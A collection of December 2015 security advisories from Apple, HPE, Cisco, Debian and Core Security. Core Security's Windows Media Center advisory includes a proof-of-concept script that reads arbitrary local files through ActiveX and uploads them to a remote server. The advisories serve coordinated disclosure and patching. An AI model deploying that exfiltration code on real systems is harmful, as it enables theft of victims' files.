CVE-2015-7074 : Apple CVE-2015-7075 dyld Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A malicious application may be able to execute arbitrary code with system privileges Description: Multiple segment validation issues existed in dyld. These were addressed through improved environment sanitization. CVE-ID CVE-2015-7072 : Apple CVE-2015-7079 : PanguTeam GPUTools Framework Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A malicious application may be able to execute arbitrary code with system privileges Description: Multiple path validation issues existed in Mobile Replayer. These were addressed through improved environment sanitization. CVE-ID CVE-2015-7069 : Luca Todesco (@qwertyoruiop) CVE-2015-7070 : Luca Todesco (@qwertyoruiop) iBooks Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Parsing a maliciously crafted iBooks file may lead to disclosure of user information Description: An XML external entity reference issue existed with iBook parsing. This issue was addressed through improved parsing. CVE-ID CVE-2015-7081 : Behrouz Sadeghipour (@Nahamsec) and Patrik Fehrenbach (@ITSecurityguard) ImageIO Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: A memory corruption issue existed in ImageIO. This issue was addressed through improved memory handling. CVE-ID CVE-2015-7053 : Apple IOHIDFamily Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A malicious application may be able to execute arbitrary code with system privileges Description: Multiple memory corruption issues existed in IOHIDFamily API. These issues were addressed through improved memory handling. CVE-ID CVE-2015-7111 : beist and ABH of BoB CVE-2015-7112 : Ian Beer of Google Project Zero IOKit SCSI Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: A null pointer dereference existed in the handling of a certain userclient type.
[CORE-2015-0014] - Microsoft Windows Media Center link file incorrectly resolved reference
1. Advisory Information Title: Microsoft Windows Media Center link file incorrectly resolved reference Advisory ID: CORE-2015-0014 Advisory URL: http://www.coresecurity.com/advisories/microsoft-windows-media-center-link-file-incorrectly-resolved-reference Date published: 2015-12-08 Date of last update: 2015-12-04 Vendors contacted: Microsoft Release mode: Coordinated release 2. Vulnerability Information Class: Use of Incorrectly-Resolved Name or Reference [CWE-706] Impact: Information leak Remotely Exploitable: No Locally Exploitable: Yes CVE Name: CVE-2015-6127 3. Vulnerability Description The 'application' tag in Microsoft [1] Windows Media Center link files (.mcl extension) can include a 'run' parameter, which indicates the path of a file to be launched when opening the MCL file, or a 'url' parameter, which indicates the URL of a web page to be loaded within the Media Center's embedded web browser. A specially crafted MCL file having said 'url' parameter pointing to the MCL file itself can trick Windows Media Center into rendering the very same MCL file as a local HTML file within the Media Center's embedded web browser. 4. Vulnerable Packages Windows 7 for x64-based Systems Service Pack 1 (with Internet Explorer 11 installed) Other versions are probably affected too, but they were not checked. 5. Vendor Information, Solutions and Workarounds Microsoft posted the following Security Bulletin: MS15-134 [2] 6. Credits This vulnerability was discovered and researched by Francisco Falcon from Core Exploits Team. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from the Core Advisories Team. 7. Technical Description / Proof of Concept Code The ehexthost.exe binary, part of Windows Media Center, loads the given URL into an embedded instance of Internet Explorer running in the local machine zone, but it doesn't opt-in for the FEATURE_LOCALMACHINE_LOCKDOWN IE security feature, therefore this situation can be leveraged by an attacker to read and exfiltrate arbitrary files from a victim's local filesystem by convincing him to open a malicious MCL file. The proof-of-concept shows an MCL file with embedded HTML + JS code, referencing itself in the 'url' parameter. Unlike what happens when loading a local HTML file into Internet Explorer 11, the JS code included here will automatically run with no prompts, and it will be able to read arbitrary local files using the MSXML2.XMLHTTP ActiveX object. Those read files then can be uploaded to an arbitrary remote web server. Also note that, in order for the PoC to work, the value of the 'url' parameter must match the name of the MCL file. 7.1. Proof of Concept A new file should be created with the name "poc-microsoft.mcl" and with the following content: function do_upload(fname, data){ var xmlhttp = new XMLHttpRequest(); xmlhttp.open("POST", "http://192.168.1.50/uploadfile.php", true); xmlhttp.setRequestHeader("Content-type", "multipart/form-data"); xmlhttp.setRequestHeader("Connection", "close"); xmlhttp.onreadystatechange = function(){if (xmlhttp.readyState == 4){alert(fname + " done.");}} xmlhttp.send(new Uint8Array(data)); } function read_local_file(filename){ /* Must use this one, XMLHttpRequest() doesn't allow to read local files */ var xmlhttp = new ActiveXObject("MSXML2.XMLHTTP"); xmlhttp.open("GET", filename, false); xmlhttp.send(); return xmlhttp.responseBody.toArray(); } function upload_file(filename){ try{ do_upload(filename, read_local_file(filename)); }catch(e){ alert(filename + " error: " + e); } } upload_file("file:///C:/Windows/System32/calc.exe"); 8. Report Timeline 2015-09-24: Core Security sent the first notification to Microsoft. 2015-09-24: Microsoft acknowledged receipt of the email and requested a draft version of the advisory. 2015-09-25: Core Security sent Microsoft the draft version of the advisory including a PoC. 2015-09-25: Microsoft cased the report under MSRC 31305. 2015-10-02: Core Security requested Microsoft provide a status update and confirmation of the reported bug. 2015-10-02: Microsoft informed Core Security that they were able to reproduce the issue. They were still reviewing it to determine if they would address it in a security release. 2015-10-07: Core Security requested Microsoft let us know once they made a decision. 2015-10-08: Microsoft informed Core Security they would keep us updated. 2015-10-26: Core Security asked Microsoft if there were any updates regarding the reported bug and if they had an estimated time of availability. 2015-10-27: Microsoft informed Core Security that they would be pursuing a fix for the reported issue and are working on a release date for it.
APPLE-SA-2015-12-08-2 tvOS 9.1
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 APPLE-SA-2015-12-08-2 tvOS 9.1 tvOS 9.1 is now available and addresses the following: AppleMobileFileIntegrity Available for: Apple TV (4th generation) Impact: A malicious application may be able to execute arbitrary code with system privileges Description: An access control issue was addressed by preventing modification of access control structures. CVE-ID CVE-2015-7055 : Apple AppSandbox Available for: Apple TV (4th generation) Impact: A malicious application may maintain access to Contacts after having access revoked Description: An issue existed in the sandbox's handling of hard links. This issue was addressed through improved hardening of the app sandbox. CVE-ID CVE-2015-7001 : Razvan Deaconescu and Mihai Bucicoiu of University POLITEHNICA of Bucharest; Luke Deshotels and William Enck of North Carolina State University; Lucas Vincenzo Davi and Ahmad-Reza Sadeghi of TU Darmstadt Compression Available for: Apple TV (4th generation) Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: An uninitialized memory access issue existed in zlib. This issue was addressed through improved memory initialization and additional validation of zlib streams. CVE-ID CVE-2015-7054 : j00ru Configuration Profiles Available for: Apple TV (4th generation) Impact: A local attacker may be able to install a configuration profile without admin privileges Description: An issue existed when installing configuration profiles. This issue was addressed through improved authorization checks. CVE-ID CVE-2015-7062 : David Mulder of Dell Software CoreGraphics Available for: Apple TV (4th generation) Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2015-7105 : John Villamil (@day6reak), Yahoo Pentest Team CoreMedia Playback Available for: Apple TV (4th generation) Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the processing of malformed media files. These issues were addressed through improved memory handling. CVE-ID CVE-2015-7074 CVE-2015-7075 : Apple Disk Images Available for: Apple TV (4th generation) Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue existed in the parsing of disk images. This issue was addressed through improved memory handling. CVE-ID CVE-2015-7110 : Ian Beer of Google Project Zero dyld Available for: Apple TV (4th generation) Impact: A malicious application may be able to execute arbitrary code with system privileges Description: Multiple segment validation issues existed in dyld. These were addressed through improved environment sanitization. CVE-ID CVE-2015-7072 : Apple CVE-2015-7079 : PanguTeam ImageIO Available for: Apple TV (4th generation) Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: A memory corruption issue existed in ImageIO. This issue was addressed through improved memory handling. CVE-ID CVE-2015-7053 : Apple IOAcceleratorFamily Available for: Apple TV (4th generation) Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in IOAcceleratorFamily. This issue was addressed through improved memory handling. CVE-ID CVE-2015-7109 : Juwei Lin of TrendMicro IOHIDFamily Available for: Apple TV (4th generation) Impact: A malicious application may be able to execute arbitrary code with system privileges Description: Multiple memory corruption issues existed in IOHIDFamily API. These issues were addressed through improved memory handling. CVE-ID CVE-2015-7111 : beist and ABH of BoB CVE-2015-7112 : Ian Beer of Google Project Zero IOKit SCSI Available for: Apple TV (4th generation) Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: A null pointer dereference existed in the handling of a certain userclient type. This issue was addressed through improved validation. CVE-ID CVE-2015-7068 : Ian Beer of Google Project Zero Kernel Available for: Apple TV (4th generation) Impact: A local application may be able to cause a denial of service Description: Multiple denial of service issues were addressed through improved memory handling. CVE-ID CVE-2015-7040 : Lufeng Li of Qihoo 360 Vulcan Team CVE-2015-7041 : Lufeng Li of Qihoo 360 Vulcan Team CVE-2015-7042 : Lufeng Li of Qihoo 360 Vulcan Team CVE-2015-7043 : Tarjei Mandt (@kernelpool) Kernel Available for: Apple TV (4th generation) Impact: A local user may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues existed in the kernel. These
[security bulletin] HPSBHF03432 rev.1 - HPE Networking Comware 5, Comware 5 Low Encryption SW, Comware 7, VCX Using NTP, Remote Access Restriction Bypass and Code Execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_n a-c04916783 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04916783 Version: 1 HPSBHF03432 rev.1 - HPE Networking Comware 5, Comware 5 Low Encryption SW, Comware 7, VCX Using NTP, Remote Access Restriction Bypass and Code Execution NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2015-12-09 Last Updated: 2015-12-09 Potential Security Impact: Remote Access Restriction Bypass, Code Execution Source: Hewlett Packard Enterprise, Product Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HPE Networking Comware 5, Comware 5, Low Encryption SW, Comware 7, and VCX, Using NTP. The vulnerabilities could be remotely exploited resulting in resulting in remote access restriction bypass and code execution. References: SSRT101878 CVE-2014-9293 CVE-2014-9294 CVE-2014-9295 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. See the RESOLUTION section for a list of impacted hardware and Comware 5, Comware 5 Low Encryption SW, Comware 7, and VCX versions. BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2014-9293(AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-9294(AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-9295(AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION Hewlett Packard Enterprise has provided updated Comware 5, Comware 5 Low Encryption SW, Comware 7 and VCX to address this on Impacted Hewlett Packard Enterprise products. Family Fixed Version HP Branded Products Impacted H3C Branded Products Impacted CVE # 8800 (Comware 5) R3627P04 JC137A HP 8805/8808/8812 (2E) Main Control Unit Module, JC138A HP 8805/8808/8812 (1E) Main Control Unit Module, JC141A HP 8802 Main Control Unit Module, JC147A HP 8802 Router Chassis, JC147B HP 8802 Router Chassis, JC148A HP 8805 Router Chassis, JC148B HP 8805 Router Chassis, JC149A HP 8808 Router Chassis, JC149B HP 8808 Router Chassis, JC150A HP 8812 Router Chassis, JC150B HP 8812 Router Chassis, JC596A HP 8800 Dual Fabric Main Processing Unit, JC597A HP 8800 Single Fabric Main Processing Unit CVE-2014-9295 A6600 (Comware 5) R3303P18 JC165A HP 6600 RPE-X1 Router Module, JC177A HP 6608 Router, JC177B HP 6608 Router Chassis, JC178A HP 6604 Router Chassis, JC178B HP 6604 Router Chassis, JC496A HP 6616 Router Chassis, JC566A HP 6600 RSE-X1 Router Main Processing Unit, JG780A HP 6600 RSE-X1 TAA-compliant Main Processing Unit, JG781A HP 6600 RPE-X1 TAA-compliant Main Processing Unit CVE-2014-9295 HSR6602 (Comware 5) R3303P18 JC176A HP 6602 Router Chassis, JG353A HP HSR6602-G Router, JG354A HP HSR6602-XG Router, JG355A HP 6600 MCP-X1 Router Main Processing Unit, JG356A HP 6600 MCP-X2 Router Main Processing Unit, JG776A HP HSR6602-G TAA-compliant Router, JG777A HP HSR6602-XG TAA-compliant Router, JG778A HP 6600 MCP-X2 Router TAA-compliant Main Processing Unit CVE-2014-9295 HSR6800 (Comware 5) R3303P18 JG361A HP HSR6802 Router Chassis, JG362A HP HSR6804 Router Chassis, JG363A HP HSR6808 Router Chassis, JG364A HP HSR6800 RSE-X2 Router Main Processing Unit, JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit CVE-2014-9295 MSR20 (Comware 5) R2513P45 JD432A HP A-MSR20-21 Router, JD662A HP MSR20-20 Router, JD663A HP A-MSR20-21 Router, JD663B HP MSR20-21 Router, JD664A HP MSR20-40 Router, JF228A HP MSR20-40 Router, JF283A HP MSR20-20 Router CVE-2014-9295 MSR20-1X (Comware 5) R2513P45 JD431A HP MSR20-10 Router, JD667A HP MSR20-15 IW Multi-Service Router, JD668A HP MSR20-13 Multi-Service Router, JD669A HP MSR20-13 W Multi-Service Router, JD670A HP MSR20-15 A Multi-Service Router, JD671A HP MSR20-15 AW Multi-Service Router, JD672A HP MSR20-15 I Multi-Service Router, JD673A HP MSR20-11 Multi-Service Router, JD674A HP MSR20-12 Multi-Service Router, JD675A HP MSR20-12 W Multi-Service Router, JD676A HP MSR20-12 T1 Multi-Service Router, JF236A HP MSR20-15-I Router, JF237A HP MSR20-15-A Router, JF238A HP MSR20-15-I-W Router, JF239A HP MSR20-11 Router, JF240A HP MSR20-13 Router, JF241A HP MSR20-12 Router, JF806A HP MSR20-12-T Router, JF807A HP MSR20-12-W Router, JF808A HP MSR20-13-W Router, JF809A HP MSR20-15-A-W Router, JF817A HP MSR20-15 Router, JG209A HP MSR20-12-T-W Router (NA), JG210A HP MSR20-13-W Router (NA) H3C MSR 20-15 Router Host(AC) 1 FE 4 LSW 1, H3C RT-MSR2015-AC-OVS-AW-H3 (0235A393), H3C RT-MSR2015-AC-OVS-I-H3 (0235A394), H3C RT-MSR2015-AC-OVS-IW-H3 (0235A38V), H3C MSR 20-11 (0235A31V), H3C MSR 20-12 (0235A32E), H3C MSR 20-12 T1 (0235A32B),
APPLE-SA-2015-12-08-5 Safari 9.0.2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 APPLE-SA-2015-12-08-5 Safari 9.0.2 Safari 9.0.2 is now available and addresses the following: WebKit Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, OS X El Capitan v10.11 and v10.11.1 Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: Multiple memory corruption issues existed in WebKit. These issues were addressed through improved memory handling. CVE-ID CVE-2015-7048 : Apple CVE-2015-7095 : Apple CVE-2015-7096 : Apple CVE-2015-7097 : Apple CVE-2015-7098 : Apple CVE-2015-7099 : Apple CVE-2015-7100 : Apple CVE-2015-7101 : Apple CVE-2015-7102 : Apple CVE-2015-7103 : Apple CVE-2015-7104 : Apple WebKit Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, OS X El Capitan 10.11 and v10.11.1 Impact: Visiting a maliciously crafted website may reveal a user's browsing history Description: An insufficient input validation issue existed in content blocking. This issue was addressed through improved content extension parsing. CVE-ID CVE-2015-7050 : Luke Li and Jonathan Metzman Installation note: Safari 9.0.2 may be obtained from the Mac App Store. Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -BEGIN PGP SIGNATURE- Comment: GPGTools - https://gpgtools.org iQIcBAEBCgAGBQJWZzRXAAoJEBcWfLTuOo7tp/kP/1QG495DAo4BKcJwr5oHxeK+ V0cld44Ot1F9+m8Pd2Il5kkE2mxEGnvOdtEQM0mOT80qfdTVi9zD4ypnFWkBcob1 tV0hEa7/LxMe1OtDMeeNM+qW22Ap6RO8o7v6mCzdn72ds0xSmiPFGuQ1RiRflKRj MjU+k61a3oEe2/rkvbBfuDSIm+4yZo1PjTDI02UoD5JC2nJ0Dlk6978hF6lLSrCv 28UR0i6NijI3Wa2Uq3gSA+qY9bo02sC1XOEveTfftLUfl1QOID0VZGHHnrao4mfx LpxYJR2XJpTvNs1x3lCOcTYWJr4Ju99/ZFkHneAj2OQEvOhP/CHuqUmUglHW9UMW CwQKAVZD242e6qPUu0xaW/nH4dQHbridWPWR3MfwiFj6Vbzc3Wpc+tx7LGdlFuhG 9/goo4MMI7QFdxFXD3bbcOhYRi6DbqJUSxTvWfpC2sssFmZ/N5kmr0w2ccXMUAGc Ez2M8Wm+gVYlCeBMS3rtPkxVcayzHZnxhj+3Fa7Qh3FAY9NdnJ/UA6xJdPrQvTpd DJsQUIK9Ung2c1D3kGGN6QgnUCgL3CtZ7RCSgPD8Zqs4q6Zhuwq6uquC3EDIZO2y HgMF1dRKihaXV5URz9IXfQAHQvbR1PD5e/KuL32bEtXwE0Oxocp1jTrIeIrW71JZ 2qcwUzBx5TzaQfLl+Rk1 =7iMd -END PGP SIGNATURE-
[security bulletin] HPSBHF03433 SSRT102964 rev.1 - HP-UX Running Mozilla Firefox and Thunderbird, Remote Disclosure of Information
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_n a-c04918839 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04918839 Version: 1 HPSBHF03433 SSRT102964 rev.1 - HP-UX Running Mozilla Firefox and Thunderbird, Remote Disclosure of Information NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2015-12-09 Last Updated: 2015-12-09 Potential Security Impact: Remote Disclosure of Information Source: Hewlett Packard Enterprise, Product Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP-UX Running Mozilla Firefox and Thunderbird. This may allow remote disclosure of information. Note: This is the TLS vulnerability using US export-grade 512-bit keys in Diffie-Hellman key exchange known as "Logjam" which could be exploited remotely resulting in disclosure of information. References: CVE-2015-4000 PSRT102964 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX Thunderbird v2.0.0.24 HP-UX Thunderbird HP-UX Firefox browser v3.5.09.00 HP-UX Firefox browser BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2015-4000(AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has provided the following configuration instructions to resolve this vulnerability. Do the following to mitigate the logjam issue in HP-UX Firefox and Thunderbird: HP-UX Firefox browser: Visit about:config in the Firefox browser Search for ssl3 and disable DHE_EXPORT ciphers by setting below preferences values to false. security.ssl3.dhe_rsa_aes_128_sha security.ssl3.dhe_rsa_aes_256_sha Restart the browser HP-UX Thunderbird: Select "Preferences" from the "Edit" menu Select "Advanced" Tab and then click on "Config Editor" button Search for security.ssl3.dhe_rsa_aes and disable DHE_EXPORT ciphers by setting below preference values to false. security.ssl3.dhe_rsa_aes_128_sha security.ssl3.dhe_rsa_aes_256_sha HISTORY Version:1 (rev.1) - 9 December 2015 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hpe.com. Report: To report a potential security vulnerability with any HPE supported product, send Email to: security-al...@hpe.com Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX Copyright 2015 Hewlett Packard Enterprise Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQEcBAEBAgAGBQJWaKP3AAoJEGIGBBYqRO9/QcEIAMOIYJMgHo5zM75Q0egT3yHs xEJL1VDjeGlijoYLlM32UihFjqP2x2af2Snx03xHpF01/FEQdup8KRHs4F320QYH qK3ruL9An4Urg6jNjv2J+1lOPYdHzwvKIpYMXBpMoPlHogOgSaB9g9h4mrp4FEDl StS7MvvLRok/2/kDWtETI8kGJExj0Jxfb0sIQ9Fv6ext3qYTZiexUwpll9GCFEeV ZfgC9zA2Gh5Hsyj+Docs5ReDgfDPUDV9NpQAVhsqS1fuAl+FTetrFvypUQPdHR0F wMLiorlK9Y3A+IJs/PpTe1cgrRoDbHS1buZYUCFjAMXDPo4BU0XVmQmFsU/suuY= =qla+ -END PGP SIGNATURE-
Cisco Security Advisory: Cisco Prime Collaboration Assurance Default Account Credential Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Cisco Security Advisory: Cisco Prime Collaboration Assurance Default Account Credential Vulnerability Advisory ID: cisco-sa-20151209-pca Revision 1.0 For Public Release 2015 December 9 16:00 UTC (GMT) +- Summary === A vulnerability in Cisco Prime Collaboration Assurance (PCA) Software could allow an unauthenticated, remote attacker to log in to the system shell with the default cmuser user account and access the shell with a limited set of permissions. The vulnerability is due to an undocumented account that has a default and static password. This account is created during installation and cannot be changed or deleted without impacting the functionality of the system. The first time this account is used the system will request that the user change the default password. An attacker could exploit this vulnerability by remotely connecting to the affected system via SSH by using the undocumented account. Successful exploitation could allow the attacker to access the system with the privileges of the cmuser user. This vulnerability allows the attacker to: access some sensitive data, such as the password file, system logs, and Cisco PCA database information; modify some data; run some internal executables; and potentially make the system unstable or inaccessible. Cisco has released software updates that address this vulnerability. Workarounds are available. This advisory is available at the following link: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-pca -BEGIN PGP SIGNATURE- Version: GnuPG/MacGPG2 v2.0.22 (Darwin) Comment: GPGTools - https://gpgtools.org iQIcBAEBCgAGBQJWaCspAAoJEIpI1I6i1Mx3z2MP/381uF5+mIQ0mw/T3wLa3BIF q+N8NG6ZlIZuQS8gtKwI9Ywl2K1GKgyyPdugsZ4lLli0Trp2tX7V8VoifX2vFGD4 nHk7/vEAVCQ8p3SZtO13ObgHOYVfAYjtm2ijSxEZYbcsM21zMnV9551edr1XCgNp MbIoUnhWzepO3ps6neirtN5ye7np7iPXiGrH98tAW6OxCZ16VOEp6tQPEzyXTHRz 8cS466q/xiltGiknANP/R4IY1L7vVAF8+mksJaFpjXsr6jBHhDFBCic1kPkJSUno SWfDz8vCu9DfzraaR4/x9madU5qcZRElpJUPsH0LKFAdGTSD80OiYpHbK9HcdoWI KafzzlNnA5iocE4I3vrxEG/hCwwbjj47XMY7mlVW46MJeopzoA71t7jF9KFpyJJs xsz9rORMXcswU46ZC+rwDiUTBBpreOJJCe8WCLzhepn1LRrJyvmTSQqzHTcpK2xA JNos6kMSU1xWIJe2J/7hqKU5VbPXGHuARI4wpatzGsSFLS9THCxrcBj43Gfd8zo/ PLR4ipJVenbBRQjEpxPTGDUltkMrdmB84iN8mB2IcfkrUXfMR6hRZijhRwcq2cVu iByoDe9Zn5H5pYbSMUXM2cNVGf+AuNYFB/CUoULC5JrKMq+1JUt4lsyL1NIC5JeR HfD0Xf/4bKhC8z2kBLAe =O1HB -END PGP SIGNATURE-
APPLE-SA-2015-12-08-4 watchOS 2.1
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 APPLE-SA-2015-12-08-4 watchOS 2.1 watchOS 2.1 is now available and addresses the following: AppSandbox Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: A malicious application may maintain access to Contacts after having access revoked Description: An issue existed in the sandbox's handling of hard links. This issue was addressed through improved hardening of the app sandbox. CVE-ID CVE-2015-7001 : Razvan Deaconescu and Mihai Bucicoiu of University POLITEHNICA of Bucharest; Luke Deshotels and William Enck of North Carolina State University; Lucas Vincenzo Davi and Ahmad-Reza Sadeghi of TU Darmstadt Compression Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: An uninitialized memory access issue existed in zlib. This issue was addressed through improved memory initialization and additional validation of zlib streams. CVE-ID CVE-2015-7054 : j00ru CoreGraphics Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2015-7105 : John Villamil (@day6reak), Yahoo Pentest Team CoreMedia Playback Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: A memory corruption issue existed in the processing of malformed media files. This issue was addressed through improved memory handling. CVE-ID CVE-2015-7075 dyld Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A segment validation issue existed in dyld. This was addressed through improved environment sanitization. CVE-ID CVE-2015-7072 : Apple FontParser Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the processing of font files. These issues were addressed through improved bounds checking. CVE-ID CVE-2015-6978 : Jaanus Kp, Clarified Security, working with HP's Zero Day Initiative GasGauge Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in the kernel. This issue was addressed through improved memory handling. CVE-ID CVE-2015-6979 : PanguTeam ImageIO Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: A memory corruption issue existed in ImageIO. This issue was addressed through improved memory handling. CVE-ID CVE-2015-7053 : Apple IOHIDFamily Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: A malicious application may be able to execute arbitrary code with system privileges Description: Multiple memory corruption issues existed in IOHIDFamily. These issues were addressed through improved memory handling. CVE-ID CVE-2015-7111 : beist and ABH of BoB CVE-2015-7112 : Ian Beer of Google Project Zero IOKit SCSI Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: A null pointer dereference existed in the handling of a certain userclient type. This issue was addressed through improved validation. CVE-ID CVE-2015-7068 : Ian Beer of Google Project Zero Kernel Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: A local application may be able to cause a denial of service Description: Multiple denial of service issues were addressed through improved memory handling. CVE-ID CVE-2015-7040 : Lufeng Li of Qihoo 360 Vulcan Team CVE-2015-7041 : Lufeng Li of Qihoo 360 Vulcan Team CVE-2015-7042 : Lufeng Li of Qihoo 360 Vulcan Team CVE-2015-7043 : Tarjei Mandt (@kernelpool) Kernel Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: A local user may be able to execute arbitrary code with kernel privileges Description: An issue existed in the parsing of mach messages. This issue was addressed through improved validation of mach messages. CVE-ID CVE-2015-7047 : Ian Beer of Google
[SECURITY] [DSA 3414-1] xen security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 - - Debian Security Advisory DSA-3414-1 secur...@debian.org https://www.debian.org/security/ Moritz Muehlenhoff December 09, 2015 https://www.debian.org/security/faq - - Package: xen CVE ID : CVE-2015-3259 CVE-2015-3340 CVE-2015-5307 CVE-2015-6654 CVE-2015-7311 CVE-2015-7812 CVE-2015-7813 CVE-2015-7814 CVE-2015-7969 CVE-2015-7970 CVE-2015-7971 CVE-2015-7972 CVE-2015-8104 Multiple security issues have been found in the Xen virtualisation solution, which may result in denial of service or information disclosure. For the oldstable distribution (wheezy), an update will be provided later. For the stable distribution (jessie), these problems have been fixed in version 4.4.1-9+deb8u3. For the unstable distribution (sid), these problems will be fixed soon. We recommend that you upgrade your xen packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v2 iQIcBAEBCAAGBQJWaJIXAAoJEBDCk7bDfE42S90P/3px90Ze6eFrTI6CT6a5q7rh /RV36XemP9n0I7BIo+QLeLnUVBSwFuOuqqIv7zeo+l3zkb40c+ledwdwMsQ/bchY 7g+ugwHI677qMJ5U29Xsl4DANqBHv1YUpMrraRxejHHKJLP8D5qt2vvG7jCTJj3S rWQyqKhvr6ngMSmORLZ9buwVVsaQuiBr8Ngz7TI9V1EiirIv1vAQ88YTBoYICxv2 z1KSEvJCPSba4g7RYir2Dr6hQCBSXt8q7jZLa8tBlmkhJv3d+BEf3TR53Gpvlnn3 4I+Vl4+zxzO84cos4t3po5FXSIKsSFQnjFNQ9b7Uym4T/KdTP8b3FViRww/d0w7r 